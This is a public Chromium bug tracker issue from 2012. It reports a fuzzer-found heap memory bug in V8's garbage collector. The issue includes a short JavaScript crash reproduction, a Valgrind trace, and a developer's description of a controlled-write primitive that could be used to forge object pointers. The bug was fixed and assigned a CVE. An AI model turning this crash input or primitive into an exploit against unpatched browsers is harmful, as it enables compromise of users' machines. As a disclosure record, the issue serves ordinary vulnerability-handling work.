New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: May 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

[LangFuzz] Crash in v8::internal::ShortCircuitConsString with invalid read

Reported by decoder...@gmail.com, May 14 2012

Issue description

VULNERABILITY DETAILS
The JavaScript code below crashes d8 shell (tested on branch 3.10 revision 11522, which is in the latest Chromium dev 20.0.1132.3) on heap with an invalid write to a strange address. 

I was not able to get a trace in Chromium itself because my test uses gc() and I don't have a debug build available that allows using --expose-gc (does Google provide Linux debug builds for download?)

VERSION
Chrome Version: 20.0.1132.3 dev (only tested through shell rev 11522)
Operating System: Ubuntu 12.04 64 bit

REPRODUCTION CASE
function KeyedStoreIC(a) { a[(1)] = Math.E; }
var literal = [1.2];
literal.length = 0;
literal.push('0' && 0 );
KeyedStoreIC(literal);
gc();

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Crash State:

Valgrind trace in d8:

==19952== Invalid read of size 8
==19952==    at 0x52E7BC: v8::internal::ShortCircuitConsString(v8::internal::Object**) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5378A0: v8::internal::FlexibleBodyVisitor<v8::internal::StaticMarkingVisitor, v8::internal::FixedArray::BodyDescriptor, void>::Visit(v8::internal::Map*, v8::internal::HeapObject*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53AD80: v8::internal::MarkCompactCollector::EmptyMarkingDeque() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4FD6E5: v8::internal::Isolate::Iterate(v8::internal::ObjectVisitor*, v8::internal::ThreadLocalTop*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4A7388: v8::internal::Heap::IterateStrongRoots(v8::internal::ObjectVisitor*, v8::internal::VisitMode) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x53BA3F: v8::internal::MarkCompactCollector::MarkLiveObjects() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x5404B8: v8::internal::MarkCompactCollector::CollectGarbage() (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ABE07: v8::internal::Heap::PerformGarbageCollection(v8::internal::GarbageCollector, v8::internal::GCTracer*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4AC623: v8::internal::Heap::CollectGarbage(v8::internal::AllocationSpace, v8::internal::GarbageCollector, char const*, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x4ACE6A: v8::internal::Heap::CollectAllGarbage(int, char const*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x46CC4E: v8::internal::GCExtension::GC(v8::Arguments const&) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==    by 0x43D1F7: v8::internal::Builtin_HandleApiCall(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) (in /scratch/holler/LangFuzz/v8-trunk/d8)
==19952==  Address 0x4005bf0a8b145768 is not stack'd, malloc'd or (recently) free'd

 
Owner: danno@chromium.org
Status: Assigned
Danno, can you please take a look.

Christian, you can download asanified chromium debug builds from https://commondatastorage.googleapis.com/chromium-browser-asan/index.html

Comment 2 by danno@chromium.org, May 14 2012

Cc: erikcorry@google.com yangguo@chromium.org

Comment 3 by danno@chromium.org, May 15 2012

I am virtually positive that this is the same as chromium:117409, which was fixed on May 9th on V8 trunk but just rolled into Chromium today. I'll double check. It is also in Chrome 20 and Chrome 19, but not Chrome 18. I'm waiting for the merge until we verify that the fix is stable in Canary.
I'm always testing on v8-trunk, not on the branches, and it reproduced for me on trunk when I reported it here.

Comment 5 by danno@chromium.org, May 15 2012

Looks like there's still a problem, this seems to be a new variant on the theme of 117409. Investigating. 

Comment 6 by danno@chromium.org, May 15 2012

It is similar but a slightly different case than 117409. Patch in progress, it will need to be marged back to 18 and 19. This bug allows you to reliably write the first element of a JSArray with any value that you can represent in the lower 32 bits of a IEEE double precision floating point number and later interpret as a tagged value, including as a object pointer.

Comment 7 by danno@chromium.org, May 15 2012

Cc: mstarzinger@chromium.org
Labels: SecSeverity-High SecImpacts-Stable SecImpacts-Beta reward-topanel
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals WebKit-JavaScript OS-All Mstone-19
Danno, isnt 117409 a security bug too, we need the tracking flags.

Comment 11 by danno@chromium.org, May 16 2012

Yes, sorry, 117409 is also a security bug, I thought it was already marked so. I've changed it to restrict viewing to the security team and be typed as a Security bug. Chris, can you please work your magic on the other security labels.

Comment 12 by danno@chromium.org, May 21 2012

Fix has been committed to trunk/Canary and merged back to 3.10 (3.10.8.9) and 3.9 (3.9.24.27). 
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
Labels: -Merge-Approved Merge-Merged
Labels: -reward-topanel reward-1000 reward-unpaid
Nice find decoder. $1000
Labels: CVE-2011-3115
Status: Fixed
Fixed with the release of 19.0.1084.52
Labels: -reward-unpaid
Cc: holi...@gmail.com
Project Member

Comment 20 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-Internals -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -WebKit-JavaScript -Mstone-19 M-19 Cr-Content-JavaScript Security-Impact-Stable Security-Impact-Beta Cr-Internals Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 24 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: Cr-Blink
Project Member

Comment 26 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-JavaScript Cr-Blink-JavaScript
Project Member

Comment 27 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 29 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment